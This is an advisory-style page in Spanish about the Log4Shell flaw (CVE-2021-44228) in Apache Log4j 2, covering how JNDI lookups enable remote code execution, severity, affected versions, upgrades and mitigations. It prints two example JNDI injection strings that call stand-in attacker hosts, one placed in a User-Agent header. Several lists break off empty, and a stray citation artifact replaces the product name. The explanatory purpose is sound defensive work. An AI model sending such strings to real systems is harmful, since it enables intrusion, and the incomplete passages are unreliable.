
CVE-2021-44228
Una vulnerabilidad crítica de ejecución remota de código en Apache Log4j 2, ampliamente conocida como Log4Shell.
CVE-2021-44228 es una vulnerabilidad crítica de RCE en :contentReference[oaicite:0]{index=0} versión 2.x (anterior a 2.15.0), descubierta en diciembre de 2021.
Permite a atacantes remotos no autenticados ejecutar código arbitrario en sistemas vulnerables simplemente enviando entradas especialmente diseñadas que son registradas por Log4j. La falla afecta a innumerables aplicaciones y servicios basados en Java a nivel global.
La vulnerabilidad surge del manejo de Log4j de las búsquedas JNDI en cadenas registradas. Un atacante puede incrustar un recurso JNDI malicioso en un mensaje registrado (por ejemplo, LDAP, DNS), como:
${jndi:ldap://attacker.com/a}
Log4j:
Esto permite a un atacante lograr una Ejecución Remota de Código (RCE) completa en los servicios afectados.
| Métrica | Detalle |
|---|---|
| Puntuación base CVSS v3.1 | 10.0 (Crítico) |
| Vector de ataque | Red |
| Privilegios requeridos | Ninguno |
| Interacción del usuario | Ninguna |
| Autenticación | No requerida |
| Impacto | RCE completa |
Debido a que Log4j se utiliza en innumerables bibliotecas y aplicaciones, cualquier sistema que registre datos no confiables podría ser vulnerable.
Las siguientes versiones de Log4j 2 son vulnerables:
> = 2.0-beta9 and < 2.15.0
Además, algunas configuraciones de 2.15.0 aún eran explotables, por lo que la versión 2.16.0 y posteriores son la base segura.
Actualice a versiones de Log4j 2:
2.17.1 o posterior
Parches posteriores mejoran aún más la seguridad (por ejemplo, 2.17.2, 2.19.0, etc.).
Si la actualización inmediata no es posible, puede:
log4j2.formatMsgNoLookups=true
JndiLookup del classpath:
zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Estos pasos ayudan a reducir la exposición hasta que pueda actualizar.



Esta vulnerabilidad es extremadamente fácil de explotar. Un atacante solo necesita enviar una cadena diseñada (por ejemplo, a través de encabezados HTTP, parámetros de formulario, mensajes de chat, campos de base de datos) que sea registrada por la aplicación:
User-Agent: ${jndi:ldap://attacker.example/a}
Una vez registrada, la aplicación realizará una búsqueda remota y puede ser forzada a ejecutar código Java controlado por el atacante.
Log4Shell tuvo un impacto global masivo:
Esta es una de las vulnerabilidades más significativas en décadas.
Puede detectar sistemas vulnerables mediante:
${jndi:)| Campo | Valor |
|---|---|
| CVE ID | CVE-2021-44228 |
| Apodo | Log4Shell |
| Producto | Apache Log4j 2 |
| Gravedad | Crítico (CVSS 10.0) |
| Tipo | Ejecución remota de código |
| Impacto | Compromiso total del sistema |
| Explotabilidad | Extremadamente fácil |
| Mitigación | Parche a ≥ 2.17.1 |
Si su aplicación o cualquier biblioteca que utilice depende de Log4j 2.x, actualice inmediatamente a una versión parcheada (≥ 2.17.1) y verifique que las búsquedas JNDI estén deshabilitadas o eliminadas donde sea posible.